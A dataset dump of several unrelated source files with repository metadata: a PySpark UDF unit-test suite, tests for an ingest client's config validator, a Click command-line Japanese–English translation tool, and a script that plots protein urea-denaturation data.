self.assertRegex(msgs['error'][0], '.*chunk_size.*')
def test_no_tile_processor(self):
schema_file = os.path.join(
resource_filename("ingestclient", "schema"),
"boss-v0.2-schema.json")
with open(schema_file, 'r') as file_handle:
schema = json.load(file_handle)
config_data = self.get_skeleton_config()
config_data['ingest_job']['ingest_type'] = 'tile'
config_data['ingest_job']['tile_size'] = {
'x': 2048,
'y': 1024,
'z': 32,
't': 1
}
config = Configuration(config_data)
validator = config.get_validator()
validator.schema = schema
msgs = validator.validate()
self.assertEqual(1, len(msgs['error']))
self.assertRegex(msgs['error'][0], '.*tile_processor.*')
def test_no_tile_size(self):
schema_file = os.path.join(
resource_filename("ingestclient", "schema"),
"boss-v0.2-schema.json")
with open(schema_file, 'r') as file_handle:
schema = json.load(file_handle)
config_data = self.get_skeleton_config()
config_data['ingest_job']['ingest_type'] = 'tile'
config_data['client']['tile_processor'] = {
"class": "ingestclient.plugins.stack.ZindexStackTileProcessor",
"params": {}
}
config = Configuration(config_data)
validator = config.get_validator()
validator.schema = schema
msgs = validator.validate()
self.assertEqual(1, len(msgs['error']))
self.assertRegex(msgs['error'][0], '.*tile_size.*')
| 34.725888
| 103
| 0.573454
|
4a0a3760a556ca092ccbaf5d1be6b4be6e8f5e59
| 28,092
|
py
|
Python
|
python/pyspark/sql/tests/test_udf.py
|
zzy1120716/spark
|
ca711778683a16999560cbdd7c61d98ad6bde6db
|
[
"Apache-2.0"
] | 2
|
2017-08-04T11:37:01.000Z
|
2017-09-24T18:21:56.000Z
|
python/pyspark/sql/tests/test_udf.py
|
zzy1120716/spark
|
ca711778683a16999560cbdd7c61d98ad6bde6db
|
[
"Apache-2.0"
] | 2
|
2016-11-21T11:03:26.000Z
|
2018-08-23T04:33:23.000Z
|
python/pyspark/sql/tests/test_udf.py
|
zzy1120716/spark
|
ca711778683a16999560cbdd7c61d98ad6bde6db
|
[
"Apache-2.0"
] | null | null | null |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import functools
import pydoc
import shutil
import tempfile
import unittest
from pyspark import SparkContext
from pyspark.sql import SparkSession, Column, Row
from pyspark.sql.functions import UserDefinedFunction, udf
from pyspark.sql.types import *
from pyspark.sql.utils import AnalysisException
from pyspark.testing.sqlutils import ReusedSQLTestCase, test_compiled, test_not_compiled_message
from pyspark.testing.utils import QuietTest
class UDFTests(ReusedSQLTestCase):
def test_udf_with_callable(self):
d = [Row(number=i, squared=i**2) for i in range(10)]
rdd = self.sc.parallelize(d)
data = self.spark.createDataFrame(rdd)
class PlusFour:
def __call__(self, col):
if col is not None:
return col + 4
call = PlusFour()
pudf = UserDefinedFunction(call, LongType())
res = data.select(pudf(data['number']).alias('plus_four'))
self.assertEqual(res.agg({'plus_four': 'sum'}).collect()[0][0], 85)
def test_udf_with_partial_function(self):
d = [Row(number=i, squared=i**2) for i in range(10)]
rdd = self.sc.parallelize(d)
data = self.spark.createDataFrame(rdd)
def some_func(col, param):
if col is not None:
return col + param
pfunc = functools.partial(some_func, param=4)
pudf = UserDefinedFunction(pfunc, LongType())
res = data.select(pudf(data['number']).alias('plus_four'))
self.assertEqual(res.agg({'plus_four': 'sum'}).collect()[0][0], 85)
def test_udf(self):
self.spark.catalog.registerFunction("twoArgs", lambda x, y: len(x) + y, IntegerType())
[row] = self.spark.sql("SELECT twoArgs('test', 1)").collect()
self.assertEqual(row[0], 5)
# This is to check if a deprecated 'SQLContext.registerFunction' can call its alias.
sqlContext = self.spark._wrapped
sqlContext.registerFunction("oneArg", lambda x: len(x), IntegerType())
[row] = sqlContext.sql("SELECT oneArg('test')").collect()
self.assertEqual(row[0], 4)
def test_udf2(self):
with self.tempView("test"):
self.spark.catalog.registerFunction("strlen", lambda string: len(string), IntegerType())
self.spark.createDataFrame(self.sc.parallelize([Row(a="test")]))\
.createOrReplaceTempView("test")
[res] = self.spark.sql("SELECT strlen(a) FROM test WHERE strlen(a) > 1").collect()
self.assertEqual(4, res[0])
def test_udf3(self):
two_args = self.spark.catalog.registerFunction(
"twoArgs", UserDefinedFunction(lambda x, y: len(x) + y))
self.assertEqual(two_args.deterministic, True)
[row] = self.spark.sql("SELECT twoArgs('test', 1)").collect()
self.assertEqual(row[0], u'5')
def test_udf_registration_return_type_none(self):
two_args = self.spark.catalog.registerFunction(
"twoArgs", UserDefinedFunction(lambda x, y: len(x) + y, "integer"), None)
self.assertEqual(two_args.deterministic, True)
[row] = self.spark.sql("SELECT twoArgs('test', 1)").collect()
self.assertEqual(row[0], 5)
def test_udf_registration_return_type_not_none(self):
with QuietTest(self.sc):
with self.assertRaisesRegexp(TypeError, "Invalid returnType"):
self.spark.catalog.registerFunction(
"f", UserDefinedFunction(lambda x, y: len(x) + y, StringType()), StringType())
def test_nondeterministic_udf(self):
# Test that nondeterministic UDFs are evaluated only once in chained UDF evaluations
import random
udf_random_col = udf(lambda: int(100 * random.random()), IntegerType()).asNondeterministic()
self.assertEqual(udf_random_col.deterministic, False)
df = self.spark.createDataFrame([Row(1)]).select(udf_random_col().alias('RAND'))
udf_add_ten = udf(lambda rand: rand + 10, IntegerType())
[row] = df.withColumn('RAND_PLUS_TEN', udf_add_ten('RAND')).collect()
self.assertEqual(row[0] + 10, row[1])
def test_nondeterministic_udf2(self):
import random
random_udf = udf(lambda: random.randint(6, 6), IntegerType()).asNondeterministic()
self.assertEqual(random_udf.deterministic, False)
random_udf1 = self.spark.catalog.registerFunction("randInt", random_udf)
self.assertEqual(random_udf1.deterministic, False)
[row] = self.spark.sql("SELECT randInt()").collect()
self.assertEqual(row[0], 6)
[row] = self.spark.range(1).select(random_udf1()).collect()
self.assertEqual(row[0], 6)
[row] = self.spark.range(1).select(random_udf()).collect()
self.assertEqual(row[0], 6)
# render_doc() reproduces the help() exception without printing output
pydoc.render_doc(udf(lambda: random.randint(6, 6), IntegerType()))
pydoc.render_doc(random_udf)
pydoc.render_doc(random_udf1)
pydoc.render_doc(udf(lambda x: x).asNondeterministic)
def test_nondeterministic_udf3(self):
# regression test for SPARK-23233
f = udf(lambda x: x)
# Here we cache the JVM UDF instance.
self.spark.range(1).select(f("id"))
# This should reset the cache to set the deterministic status correctly.
f = f.asNondeterministic()
# Check the deterministic status of udf.
df = self.spark.range(1).select(f("id"))
deterministic = df._jdf.logicalPlan().projectList().head().deterministic()
self.assertFalse(deterministic)
def test_nondeterministic_udf_in_aggregate(self):
from pyspark.sql.functions import sum
import random
udf_random_col = udf(lambda: int(100 * random.random()), 'int').asNondeterministic()
df = self.spark.range(10)
with QuietTest(self.sc):
with self.assertRaisesRegexp(AnalysisException, "nondeterministic"):
df.groupby('id').agg(sum(udf_random_col())).collect()
with self.assertRaisesRegexp(AnalysisException, "nondeterministic"):
df.agg(sum(udf_random_col())).collect()
def test_chained_udf(self):
self.spark.catalog.registerFunction("double", lambda x: x + x, IntegerType())
[row] = self.spark.sql("SELECT double(1)").collect()
self.assertEqual(row[0], 2)
[row] = self.spark.sql("SELECT double(double(1))").collect()
self.assertEqual(row[0], 4)
[row] = self.spark.sql("SELECT double(double(1) + 1)").collect()
self.assertEqual(row[0], 6)
def test_single_udf_with_repeated_argument(self):
# regression test for SPARK-20685
self.spark.catalog.registerFunction("add", lambda x, y: x + y, IntegerType())
row = self.spark.sql("SELECT add(1, 1)").first()
self.assertEqual(tuple(row), (2, ))
def test_multiple_udfs(self):
self.spark.catalog.registerFunction("double", lambda x: x * 2, IntegerType())
[row] = self.spark.sql("SELECT double(1), double(2)").collect()
self.assertEqual(tuple(row), (2, 4))
[row] = self.spark.sql("SELECT double(double(1)), double(double(2) + 2)").collect()
self.assertEqual(tuple(row), (4, 12))
self.spark.catalog.registerFunction("add", lambda x, y: x + y, IntegerType())
[row] = self.spark.sql("SELECT double(add(1, 2)), add(double(2), 1)").collect()
self.assertEqual(tuple(row), (6, 5))
def test_udf_in_filter_on_top_of_outer_join(self):
left = self.spark.createDataFrame([Row(a=1)])
right = self.spark.createDataFrame([Row(a=1)])
df = left.join(right, on='a', how='left_outer')
df = df.withColumn('b', udf(lambda x: 'x')(df.a))
self.assertEqual(df.filter('b = "x"').collect(), [Row(a=1, b='x')])
def test_udf_in_filter_on_top_of_join(self):
# regression test for SPARK-18589
left = self.spark.createDataFrame([Row(a=1)])
right = self.spark.createDataFrame([Row(b=1)])
f = udf(lambda a, b: a == b, BooleanType())
df = left.crossJoin(right).filter(f("a", "b"))
self.assertEqual(df.collect(), [Row(a=1, b=1)])
def test_udf_in_join_condition(self):
# regression test for SPARK-25314
left = self.spark.createDataFrame([Row(a=1)])
right = self.spark.createDataFrame([Row(b=1)])
f = udf(lambda a, b: a == b, BooleanType())
# The udf uses attributes from both sides of join, so it is pulled out as Filter +
# Cross join.
df = left.join(right, f("a", "b"))
with self.sql_conf({"spark.sql.crossJoin.enabled": False}):
with self.assertRaisesRegexp(AnalysisException, 'Detected implicit cartesian product'):
df.collect()
with self.sql_conf({"spark.sql.crossJoin.enabled": True}):
self.assertEqual(df.collect(), [Row(a=1, b=1)])
def test_udf_in_left_outer_join_condition(self):
# regression test for SPARK-26147
from pyspark.sql.functions import col
left = self.spark.createDataFrame([Row(a=1)])
right = self.spark.createDataFrame([Row(b=1)])
f = udf(lambda a: str(a), StringType())
# The join condition can't be pushed down, as it refers to attributes from both sides.
# The Python UDF only refer to attributes from one side, so it's evaluable.
df = left.join(right, f("a") == col("b").cast("string"), how="left_outer")
with self.sql_conf({"spark.sql.crossJoin.enabled": True}):
self.assertEqual(df.collect(), [Row(a=1, b=1)])
def test_udf_and_common_filter_in_join_condition(self):
# regression test for SPARK-25314
# test the complex scenario with both udf and common filter
left = self.spark.createDataFrame([Row(a=1, a1=1, a2=1), Row(a=2, a1=2, a2=2)])
right = self.spark.createDataFrame([Row(b=1, b1=1, b2=1), Row(b=1, b1=3, b2=1)])
f = udf(lambda a, b: a == b, BooleanType())
df = left.join(right, [f("a", "b"), left.a1 == right.b1])
# do not need spark.sql.crossJoin.enabled=true for udf is not the only join condition.
self.assertEqual(df.collect(), [Row(a=1, a1=1, a2=1, b=1, b1=1, b2=1)])
def test_udf_not_supported_in_join_condition(self):
# regression test for SPARK-25314
# test python udf is not supported in join type except inner join.
left = self.spark.createDataFrame([Row(a=1, a1=1, a2=1), Row(a=2, a1=2, a2=2)])
right = self.spark.createDataFrame([Row(b=1, b1=1, b2=1), Row(b=1, b1=3, b2=1)])
f = udf(lambda a, b: a == b, BooleanType())
def runWithJoinType(join_type, type_string):
with self.assertRaisesRegexp(
AnalysisException,
'Using PythonUDF.*%s is not supported.' % type_string):
left.join(right, [f("a", "b"), left.a1 == right.b1], join_type).collect()
runWithJoinType("full", "FullOuter")
runWithJoinType("left", "LeftOuter")
runWithJoinType("right", "RightOuter")
runWithJoinType("leftanti", "LeftAnti")
runWithJoinType("leftsemi", "LeftSemi")
def test_udf_as_join_condition(self):
left = self.spark.createDataFrame([Row(a=1, a1=1, a2=1), Row(a=2, a1=2, a2=2)])
right = self.spark.createDataFrame([Row(b=1, b1=1, b2=1), Row(b=1, b1=3, b2=1)])
f = udf(lambda a: a, IntegerType())
df = left.join(right, [f("a") == f("b"), left.a1 == right.b1])
self.assertEqual(df.collect(), [Row(a=1, a1=1, a2=1, b=1, b1=1, b2=1)])
def test_udf_without_arguments(self):
self.spark.catalog.registerFunction("foo", lambda: "bar")
[row] = self.spark.sql("SELECT foo()").collect()
self.assertEqual(row[0], "bar")
def test_udf_with_array_type(self):
with self.tempView("test"):
d = [Row(l=list(range(3)), d={"key": list(range(5))})]
rdd = self.sc.parallelize(d)
self.spark.createDataFrame(rdd).createOrReplaceTempView("test")
self.spark.catalog.registerFunction(
"copylist", lambda l: list(l), ArrayType(IntegerType()))
self.spark.catalog.registerFunction("maplen", lambda d: len(d), IntegerType())
[(l1, l2)] = self.spark.sql("select copylist(l), maplen(d) from test").collect()
self.assertEqual(list(range(3)), l1)
self.assertEqual(1, l2)
def test_broadcast_in_udf(self):
bar = {"a": "aa", "b": "bb", "c": "abc"}
foo = self.sc.broadcast(bar)
self.spark.catalog.registerFunction("MYUDF", lambda x: foo.value[x] if x else '')
[res] = self.spark.sql("SELECT MYUDF('c')").collect()
self.assertEqual("abc", res[0])
[res] = self.spark.sql("SELECT MYUDF('')").collect()
self.assertEqual("", res[0])
def test_udf_with_filter_function(self):
df = self.spark.createDataFrame([(1, "1"), (2, "2"), (1, "2"), (1, "2")], ["key", "value"])
from pyspark.sql.functions import col
from pyspark.sql.types import BooleanType
my_filter = udf(lambda a: a < 2, BooleanType())
sel = df.select(col("key"), col("value")).filter((my_filter(col("key"))) & (df.value < "2"))
self.assertEqual(sel.collect(), [Row(key=1, value='1')])
def test_udf_with_aggregate_function(self):
df = self.spark.createDataFrame([(1, "1"), (2, "2"), (1, "2"), (1, "2")], ["key", "value"])
from pyspark.sql.functions import col, sum
from pyspark.sql.types import BooleanType
my_filter = udf(lambda a: a == 1, BooleanType())
sel = df.select(col("key")).distinct().filter(my_filter(col("key")))
self.assertEqual(sel.collect(), [Row(key=1)])
my_copy = udf(lambda x: x, IntegerType())
my_add = udf(lambda a, b: int(a + b), IntegerType())
my_strlen = udf(lambda x: len(x), IntegerType())
sel = df.groupBy(my_copy(col("key")).alias("k"))\
.agg(sum(my_strlen(col("value"))).alias("s"))\
.select(my_add(col("k"), col("s")).alias("t"))
self.assertEqual(sel.collect(), [Row(t=4), Row(t=3)])
def test_udf_in_generate(self):
from pyspark.sql.functions import explode
df = self.spark.range(5)
f = udf(lambda x: list(range(x)), ArrayType(LongType()))
row = df.select(explode(f(*df))).groupBy().sum().first()
self.assertEqual(row[0], 10)
df = self.spark.range(3)
res = df.select("id", explode(f(df.id))).collect()
self.assertEqual(res[0][0], 1)
self.assertEqual(res[0][1], 0)
self.assertEqual(res[1][0], 2)
self.assertEqual(res[1][1], 0)
self.assertEqual(res[2][0], 2)
self.assertEqual(res[2][1], 1)
range_udf = udf(lambda value: list(range(value - 1, value + 1)), ArrayType(IntegerType()))
res = df.select("id", explode(range_udf(df.id))).collect()
self.assertEqual(res[0][0], 0)
self.assertEqual(res[0][1], -1)
self.assertEqual(res[1][0], 0)
self.assertEqual(res[1][1], 0)
self.assertEqual(res[2][0], 1)
self.assertEqual(res[2][1], 0)
self.assertEqual(res[3][0], 1)
self.assertEqual(res[3][1], 1)
def test_udf_with_order_by_and_limit(self):
my_copy = udf(lambda x: x, IntegerType())
df = self.spark.range(10).orderBy("id")
res = df.select(df.id, my_copy(df.id).alias("copy")).limit(1)
self.assertEqual(res.collect(), [Row(id=0, copy=0)])
def test_udf_registration_returns_udf(self):
df = self.spark.range(10)
add_three = self.spark.udf.register("add_three", lambda x: x + 3, IntegerType())
self.assertListEqual(
df.selectExpr("add_three(id) AS plus_three").collect(),
df.select(add_three("id").alias("plus_three")).collect()
)
# This is to check if a 'SQLContext.udf' can call its alias.
sqlContext = self.spark._wrapped
add_four = sqlContext.udf.register("add_four", lambda x: x + 4, IntegerType())
self.assertListEqual(
df.selectExpr("add_four(id) AS plus_four").collect(),
df.select(add_four("id").alias("plus_four")).collect()
)
def test_non_existed_udf(self):
spark = self.spark
self.assertRaisesRegexp(AnalysisException, "Can not load class non_existed_udf",
lambda: spark.udf.registerJavaFunction("udf1", "non_existed_udf"))
# This is to check if a deprecated 'SQLContext.registerJavaFunction' can call its alias.
sqlContext = spark._wrapped
self.assertRaisesRegexp(AnalysisException, "Can not load class non_existed_udf",
lambda: sqlContext.registerJavaFunction("udf1", "non_existed_udf"))
def test_non_existed_udaf(self):
spark = self.spark
self.assertRaisesRegexp(AnalysisException, "Can not load class non_existed_udaf",
lambda: spark.udf.registerJavaUDAF("udaf1", "non_existed_udaf"))
def test_udf_with_input_file_name(self):
from pyspark.sql.functions import input_file_name
sourceFile = udf(lambda path: path, StringType())
filePath = "python/test_support/sql/people1.json"
row = self.spark.read.json(filePath).select(sourceFile(input_file_name())).first()
self.assertTrue(row[0].find("people1.json") != -1)
def test_udf_with_input_file_name_for_hadooprdd(self):
from pyspark.sql.functions import input_file_name
def filename(path):
return path
sameText = udf(filename, StringType())
rdd = self.sc.textFile('python/test_support/sql/people.json')
df = self.spark.read.json(rdd).select(input_file_name().alias('file'))
row = df.select(sameText(df['file'])).first()
self.assertTrue(row[0].find("people.json") != -1)
rdd2 = self.sc.newAPIHadoopFile(
'python/test_support/sql/people.json',
'org.apache.hadoop.mapreduce.lib.input.TextInputFormat',
'org.apache.hadoop.io.LongWritable',
'org.apache.hadoop.io.Text')
df2 = self.spark.read.json(rdd2).select(input_file_name().alias('file'))
row2 = df2.select(sameText(df2['file'])).first()
self.assertTrue(row2[0].find("people.json") != -1)
def test_udf_defers_judf_initialization(self):
# This is separate of UDFInitializationTests
# to avoid context initialization
# when udf is called
f = UserDefinedFunction(lambda x: x, StringType())
self.assertIsNone(
f._judf_placeholder,
"judf should not be initialized before the first call."
)
self.assertIsInstance(f("foo"), Column, "UDF call should return a Column.")
self.assertIsNotNone(
f._judf_placeholder,
"judf should be initialized after UDF has been called."
)
def test_udf_with_string_return_type(self):
add_one = UserDefinedFunction(lambda x: x + 1, "integer")
make_pair = UserDefinedFunction(lambda x: (-x, x), "struct<x:integer,y:integer>")
make_array = UserDefinedFunction(
lambda x: [float(x) for x in range(x, x + 3)], "array<double>")
expected = (2, Row(x=-1, y=1), [1.0, 2.0, 3.0])
actual = (self.spark.range(1, 2).toDF("x")
.select(add_one("x"), make_pair("x"), make_array("x"))
.first())
self.assertTupleEqual(expected, actual)
def test_udf_shouldnt_accept_noncallable_object(self):
non_callable = None
self.assertRaises(TypeError, UserDefinedFunction, non_callable, StringType())
def test_udf_with_decorator(self):
from pyspark.sql.functions import lit
from pyspark.sql.types import IntegerType, DoubleType
@udf(IntegerType())
def add_one(x):
if x is not None:
return x + 1
@udf(returnType=DoubleType())
def add_two(x):
if x is not None:
return float(x + 2)
@udf
def to_upper(x):
if x is not None:
return x.upper()
@udf()
def to_lower(x):
if x is not None:
return x.lower()
@udf
def substr(x, start, end):
if x is not None:
return x[start:end]
@udf("long")
def trunc(x):
return int(x)
@udf(returnType="double")
def as_double(x):
return float(x)
df = (
self.spark
.createDataFrame(
[(1, "Foo", "foobar", 3.0)], ("one", "Foo", "foobar", "float"))
.select(
add_one("one"), add_two("one"),
to_upper("Foo"), to_lower("Foo"),
substr("foobar", lit(0), lit(3)),
trunc("float"), as_double("one")))
self.assertListEqual(
[tpe for _, tpe in df.dtypes],
["int", "double", "string", "string", "string", "bigint", "double"]
)
self.assertListEqual(
list(df.first()),
[2, 3.0, "FOO", "foo", "foo", 3, 1.0]
)
def test_udf_wrapper(self):
from pyspark.sql.types import IntegerType
def f(x):
"""Identity"""
return x
return_type = IntegerType()
f_ = udf(f, return_type)
self.assertTrue(f.__doc__ in f_.__doc__)
self.assertEqual(f, f_.func)
self.assertEqual(return_type, f_.returnType)
class F(object):
"""Identity"""
def __call__(self, x):
return x
f = F()
return_type = IntegerType()
f_ = udf(f, return_type)
self.assertTrue(f.__doc__ in f_.__doc__)
self.assertEqual(f, f_.func)
self.assertEqual(return_type, f_.returnType)
f = functools.partial(f, x=1)
return_type = IntegerType()
f_ = udf(f, return_type)
self.assertTrue(f.__doc__ in f_.__doc__)
self.assertEqual(f, f_.func)
self.assertEqual(return_type, f_.returnType)
def test_nonparam_udf_with_aggregate(self):
import pyspark.sql.functions as f
df = self.spark.createDataFrame([(1, 2), (1, 2)])
f_udf = f.udf(lambda: "const_str")
rows = df.distinct().withColumn("a", f_udf()).collect()
self.assertEqual(rows, [Row(_1=1, _2=2, a=u'const_str')])
# SPARK-24721
@unittest.skipIf(not test_compiled, test_not_compiled_message)
def test_datasource_with_udf(self):
from pyspark.sql.functions import lit, col
path = tempfile.mkdtemp()
shutil.rmtree(path)
try:
self.spark.range(1).write.mode("overwrite").format('csv').save(path)
filesource_df = self.spark.read.option('inferSchema', True).csv(path).toDF('i')
datasource_df = self.spark.read \
.format("org.apache.spark.sql.sources.SimpleScanSource") \
.option('from', 0).option('to', 1).load().toDF('i')
datasource_v2_df = self.spark.read \
.format("org.apache.spark.sql.sources.v2.SimpleDataSourceV2") \
.load().toDF('i', 'j')
c1 = udf(lambda x: x + 1, 'int')(lit(1))
c2 = udf(lambda x: x + 1, 'int')(col('i'))
f1 = udf(lambda x: False, 'boolean')(lit(1))
f2 = udf(lambda x: False, 'boolean')(col('i'))
for df in [filesource_df, datasource_df, datasource_v2_df]:
result = df.withColumn('c', c1)
expected = df.withColumn('c', lit(2))
self.assertEquals(expected.collect(), result.collect())
for df in [filesource_df, datasource_df, datasource_v2_df]:
result = df.withColumn('c', c2)
expected = df.withColumn('c', col('i') + 1)
self.assertEquals(expected.collect(), result.collect())
for df in [filesource_df, datasource_df, datasource_v2_df]:
for f in [f1, f2]:
result = df.filter(f)
self.assertEquals(0, result.count())
finally:
shutil.rmtree(path)
# SPARK-25591
def test_same_accumulator_in_udfs(self):
data_schema = StructType([StructField("a", IntegerType(), True),
StructField("b", IntegerType(), True)])
data = self.spark.createDataFrame([[1, 2]], schema=data_schema)
test_accum = self.sc.accumulator(0)
def first_udf(x):
test_accum.add(1)
return x
def second_udf(x):
test_accum.add(100)
return x
func_udf = udf(first_udf, IntegerType())
func_udf2 = udf(second_udf, IntegerType())
data = data.withColumn("out1", func_udf(data["a"]))
data = data.withColumn("out2", func_udf2(data["b"]))
data.collect()
self.assertEqual(test_accum.value, 101)
# SPARK-26293
def test_udf_in_subquery(self):
f = udf(lambda x: x, "long")
with self.tempView("v"):
self.spark.range(1).filter(f("id") >= 0).createTempView("v")
sql = self.spark.sql
result = sql("select i from values(0L) as data(i) where i in (select id from v)")
self.assertEqual(result.collect(), [Row(i=0)])
def test_udf_globals_not_overwritten(self):
@udf('string')
def f():
assert "itertools" not in str(map)
self.spark.range(1).select(f()).collect()
def test_worker_original_stdin_closed(self):
# Test if it closes the original standard input of worker inherited from the daemon,
# and replaces it with '/dev/null'. See SPARK-26175.
def task(iterator):
import sys
res = sys.stdin.read()
# Because the standard input is '/dev/null', it reaches to EOF.
assert res == '', "Expect read EOF from stdin."
return iterator
self.sc.parallelize(range(1), 1).mapPartitions(task).count()
class UDFInitializationTests(unittest.TestCase):
def tearDown(self):
if SparkSession._instantiatedSession is not None:
SparkSession._instantiatedSession.stop()
if SparkContext._active_spark_context is not None:
SparkContext._active_spark_context.stop()
def test_udf_init_shouldnt_initialize_context(self):
UserDefinedFunction(lambda x: x, StringType())
self.assertIsNone(
SparkContext._active_spark_context,
"SparkContext shouldn't be initialized when UserDefinedFunction is created."
)
self.assertIsNone(
SparkSession._instantiatedSession,
"SparkSession shouldn't be initialized when UserDefinedFunction is created."
)
if __name__ == "__main__":
from pyspark.sql.tests.test_udf import *
try:
import xmlrunner
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
| 42.371041
| 100
| 0.609391
|
4a0a39061f9cc7e1555c400e973f3f7325573b32
| 3,473
|
py
|
Python
|
cmd.py
|
togatoga/vn
|
1266b40a1986bb28e72a6cc06bf45d61cd44b5db
|
[
"MIT"
] | 7
|
2018-01-31T18:00:09.000Z
|
2018-08-21T01:49:44.000Z
|
cmd.py
|
togatoga/vn
|
1266b40a1986bb28e72a6cc06bf45d61cd44b5db
|
[
"MIT"
] | 1
|
2018-03-07T23:56:29.000Z
|
2018-03-07T23:56:29.000Z
|
cmd.py
|
togatoga/vn
|
1266b40a1986bb28e72a6cc06bf45d61cd44b5db
|
[
"MIT"
] | 1
|
2021-01-26T19:12:44.000Z
|
2021-01-26T19:12:44.000Z
|
#!/usr/bin/env python
import click
import crayons
from prompt_toolkit import prompt
from bs4 import BeautifulSoup
from vn.util import is_japanese,get_synonyms
from vn.glosbe import Glosbe
@click.group()
def cmd():
pass
@cmd.command(help="translate [phrase]")
@click.argument('phrase', required=False)
@click.option("--interactive", "-i", is_flag=True, help='interactive mode')
@click.option("--from", "-f", 'frm', default="jpn", help='language of phrase to translate, values: ISO 693-3 three letter language code')
@click.option("--dest", "-d", 'dst', default="eng", help='destination language, values: ISO 693-3 three letter language code')
@click.option("--limit", "-l", "limit", default=10, help='output limit')
def translate(interactive, phrase, frm, dst, limit):
if interactive:
click.echo(':q quit')
while (True):
phrase = prompt("[vn] > ")
if is_japanese(phrase):
frm = 'jpn'
dst = 'eng'
else:
frm = 'eng'
dst = 'jpn'
if phrase == ':q':
break
if phrase == '' or phrase == None:
click.echo('empty phrase')
continue
result = _translate(phrase, frm, dst)
translations = result.get_translations()
synonyms = get_synonyms(phrase)
examples = result.get_examples()
print_translations(translations, limit)
print_synonyms(synonyms)
print_examples(examples, frm, dst)
else:
if phrase == '' or phrase == None:
click.echo('empty phrase')
exit(1)
if is_japanese(phrase):
frm = 'jpn'
dst = 'eng'
else:
frm = 'eng'
dst = 'jpn'
result = _translate(phrase, frm, dst)
synonyms = get_synonyms(phrase)
translations = result.get_translations()
examples = result.get_examples()
print_translations(translations, limit)
print_synonyms(synonyms)
print_examples(examples, frm, dst)
def print_synonyms(synonyms):
if len(synonyms) == 0:
return
print ("Synonyms:")
print ("\t - ", ", ".join(synonyms))
def print_examples(examples, frm, dst, limit=5):
if len(examples) == 0:
return
print (crayons.white("Example:"))
for i, example in enumerate(examples):
example = list(map(lambda x: BeautifulSoup(x, "lxml").get_text(), example))
if frm == 'eng' and dst == 'jpn':
print (crayons.white("\tENG - {}".format(example[0])))
print (crayons.white("\tJPN - {}".format(example[1])))
elif frm == 'jpn' and dst == 'eng':
print (crayons.white("\tJPN - {}".format(example[0])))
print (crayons.white("\tENG - {}".format(example[1])))
if i > limit:
break
print()
def print_translations(translations, limit):
if len(translations) == 0:
return
print (crayons.white("Translation:"))
for i, translation in enumerate(translations):
print (crayons.white("\t - {}".format(translation)))
if i > limit:
break
def _translate(phrase, frm, dst):
api = Glosbe(frm, dst)
click.echo("translate... %s from %s to %s" % (crayons.red(phrase), crayons.blue(frm), crayons.blue(dst)))
api.translate(phrase, tm=True)
return api
def main():
cmd()
if __name__ == "__main__":
main()
| 31.288288
| 137
| 0.576447
|
4a0a392b802c524b22ca757ed9cc3b0a78e7cfe7
| 2,625
|
py
|
Python
|
src/inhibitor_urea_denaturation/plot_proteins.py
|
dezeraecox-manuscripts/COX_Proteome-stability
|
a5397baae7f0bc73980b88f8ccf7b83e3d05f590
|
[
"MIT"
] | null | null | null |
src/inhibitor_urea_denaturation/plot_proteins.py
|
dezeraecox-manuscripts/COX_Proteome-stability
|
a5397baae7f0bc73980b88f8ccf7b83e3d05f590
|
[
"MIT"
] | null | null | null |
src/inhibitor_urea_denaturation/plot_proteins.py
|
dezeraecox-manuscripts/COX_Proteome-stability
|
a5397baae7f0bc73980b88f8ccf7b83e3d05f590
|
[
"MIT"
] | null | null | null |
import os
import re
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import matplotlib
from loguru import logger
from GEN_Utils import FileHandling
logger.info('Import OK')
font = {'family' : 'normal',
'weight' : 'normal',
'size' : 12 }
matplotlib.rc('font', **font)
plt.rcParams['svg.fonttype'] = 'none'
input_path = 'results/inhibitor_urea_denaturation/detect_outliers/outlier_summary.xlsx'
output_folder = 'results/inhibitor_urea_denaturation/plot_proteins/'
if not os.path.exists(output_folder):
os.mkdir(output_folder)
# ----------------------Prepare raw data----------------------
compiled = pd.read_excel(input_path, sheet_name=None)
compiled.update({key: df.drop([col for col in df.columns.tolist(
) if 'Unnamed: ' in str(col)], axis=1) for key, df in compiled.items()})
# collect outliers
outliers = compiled['outliers'].copy()
# Collect all peptides for each outlier protein
all_peps = compiled['summary'].copy()
all_peps = all_peps[all_peps['count'] >= 7].copy()
all_peps['noncys_ratio_std'] = all_peps['noncys_ratio_std'].replace(
0, np.nan) # remove single-noncys-peptide proteins
all_peps.dropna(subset=['noncys_ratio_std'], inplace=True)
for protein in outliers['Proteins'].unique().tolist():
protein_df = all_peps[all_peps['Proteins'] == protein].copy()
protein_df = protein_df[protein_df['Sequence'].str.contains('C')].copy()
palette = {
seq: 'black' if 'C' in seq else 'darkgrey' for seq in protein_df['Sequence'].tolist()}
dashes = {
seq: '' if (outlier == 1) else (2, 2) for seq, outlier in protein_df[['Sequence', 'outlier']].values}
# dashes = {1: '', 0: (2, 2)}
for_plotting = pd.melt(
protein_df,
id_vars=['Sequence', 'outlier'],
value_vars=[col for col in protein_df if type(col) != str],
var_name='Urea Conc. (M)',
value_name='Corrected cys ratio'
).dropna()
thresh_band = protein_df['noncys_ratio_std'].tolist()[0]
fig, ax = plt.subplots()
sns.lineplot(
data=for_plotting,
x='Urea Conc. (M)',
y='Corrected cys ratio',
hue='Sequence',
palette=palette,
style='Sequence',
dashes=dashes,
marker='o'
)
plt.fill_between(
x=np.arange(0, 7),
y1=-thresh_band,
y2=thresh_band,
color='lightgrey',
alpha=0.5)
plt.title(f'{protein}')
plt.ylim(-1.25, 1.25)
plt.legend(bbox_to_anchor=(1.0, 1.0))
plt.savefig(f'{output_folder}{protein}.svg')
plt.savefig(f'{output_folder}{protein}.png')
plt.show()
plt.clf()
| 31.25
| 109
| 0.645714
|
4a0a39d3be9377d8cb99fef8f0a1811180f97055
| 802
|
py
|
Python
|
